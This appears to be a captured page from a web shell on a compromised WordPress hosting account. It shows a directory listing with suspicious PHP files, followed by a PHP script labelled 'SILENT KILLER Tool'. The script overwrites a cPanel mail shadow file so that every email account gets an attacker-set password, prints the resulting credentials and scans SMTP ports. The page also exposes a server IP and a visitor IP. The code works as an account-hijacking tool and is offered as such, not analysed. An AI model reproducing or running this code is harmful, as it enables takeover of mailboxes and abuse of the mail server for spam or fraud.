Current Path: > home > ivftiowh > greeceivf.com > > > >
Operation : Linux premium88.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64 Software : Apache Server IP : 185.61.154.216 | Your IP: 216.73.216.44 Domains : 1034 Domain(s) Permission : [ 0750 ]
| Name | Type | Size | Last Modified | Actions |
|---|---|---|---|---|
| .tmb | Directory | - | - | |
| .well-known | Directory | - | - | |
| cgi-bin | Directory | - | - | |
| wp-admin | Directory | - | - | |
| wp-content | Directory | - | - | |
| wp-includes | Directory | - | - | |
| .hcflag | File | 31 bytes | September 19 2025 01:30:19. | |
| .htaccess | File | 674 bytes | July 09 2025 10:39:08. | |
| .htaccess.bk | File | 319 bytes | June 14 2021 09:55:39. | |
| .litespeed_flag | File | 297 bytes | September 19 2025 01:33:56. | |
| admin.php | File | 5361 bytes | September 19 2025 06:44:54. | |
| class.php | File | 1787 bytes | July 09 2025 10:39:07. | |
| classwithtostring.php | File | 10884 bytes | June 18 2025 01:34:16. | |
| css.zip | File | 1686 bytes | July 17 2025 03:35:49. | |
| error_log | File | 27294958 bytes | September 19 2025 20:27:40. | |
| license.txt | File | 19903 bytes | March 06 2025 19:24:24. | |
| prayer_intentions.php | File | 11005 bytes | June 18 2025 09:20:32. | |
| readme.html | File | 7425 bytes | July 15 2025 21:36:20. | |
| robots.txt | File | 64 bytes | June 18 2025 08:48:19. | |
| smpt2.php | File | 1978 bytes | June 18 2025 09:20:32. | |
| wp-activate.php | File | 7387 bytes | February 13 2024 19:19:10. | |
| wp-blog-header.php | File | 351 bytes | February 06 2020 11:33:12. | |
| wp-comments-post.php | File | 2323 bytes | June 14 2023 18:11:16. | |
| wp-config-sample.php | File | 29510 bytes | June 18 2025 09:20:32. | |
| wp-config.php | File | 3177 bytes | May 07 2025 02:19:09. | |
| wp-cron.php | File | 5617 bytes | August 02 2024 23:40:16. | |
| wp-links-opml.php | File | 2502 bytes | November 27 2022 02:01:18. | |
| wp-load.php | File | 3937 bytes | March 11 2024 14:05:16. | |
| wp-login.php | File | 51414 bytes | February 03 2025 21:55:24. | |
| wp-mail.php | File | 8727 bytes | February 08 2025 21:00:20. | |
| wp-route.php | File | 34998 bytes | August 17 2025 07:36:16. | |
| wp-settings.php | File | 30081 bytes | March 04 2025 18:06:28. | |
| wp-signup.php | File | 34516 bytes | March 10 2025 22:16:28. | |
| wp-trackback.php | File | 5102 bytes | October 18 2024 19:56:18. | |
| xmlrpc.php | File | 3205 bytes | November 08 2024 20:52:18. |
<?php
set_time_limit(0);
ini_set('max_execution_time', 0);
ini_set('memory_limit', -1);
// Ports to scan for SMTP (common ones)
$ports = array(25, 587, 465, 110, 995, 143, 993);
$primary_port = '25';
// Current user
$user = get_current_user();
// Generate a secure random password (8 bytes for the example)
function generateRandomPassword($length = 12) {
return bin2hex(random_bytes($length / 2)); // Length in characters, 1 byte = 2 hex characters
}
// Generate the random password
$password = generateRandomPassword();
// Encrypt the password using the crypt() function (with bcrypt hashing)
$pwd = crypt($password, '$6$vvebos$');
// Get server hostname
$t = $_SERVER['SERVER_NAME'];
$t = @str_replace("www.", "", $t);
// Attempt to read password file (shadow file in this example)
@$passwd = file_get_contents('/home/' . $user . '/etc/' . $t . '/shadow');
$ex = explode("\r\n", $passwd);
// Backup shadow file before modifying (make sure you have permission)
@link('/home/' . $user . '/etc/' . $t . '/shadow', '/home/' . $user . '/etc/' . $t . '/shadow.vvebos.bak');
// Delete the shadow file (potential risk, be cautious)
@unlink('/home/' . $user . '/etc/' . $t . '/shadow');
// Replace password hashes (securely modifying user data)
foreach ($ex as $ex) {
$ex = explode(':', $ex);
$e = $ex[0];
if ($e) {
$b = fopen('/home/' . $user . '/etc/' . $t . '/shadow', 'ab');
fwrite($b, $e . ':' . $pwd . ':16249:::::' . "\r\n");
fclose($b);
echo '<span style="color:#00ff00;">' . $t . '|25|' . $e . '@' . $t . '|' . $password . '</span><br>';
}
}
// Scan SMTP ports and show open ones
foreach ($ports as $port) {
$connection = @fsockopen($t, $port, $errno, $errstr, 2);
if (is_resource($connection)) {
echo '<h2>' . $t . ':' . $port . ' ' . '(' . getservbyport($port, 'tcp') . ') is open.</h2>' . "\n";
fclose($connection);
}
}
?>
SILENT KILLER Tool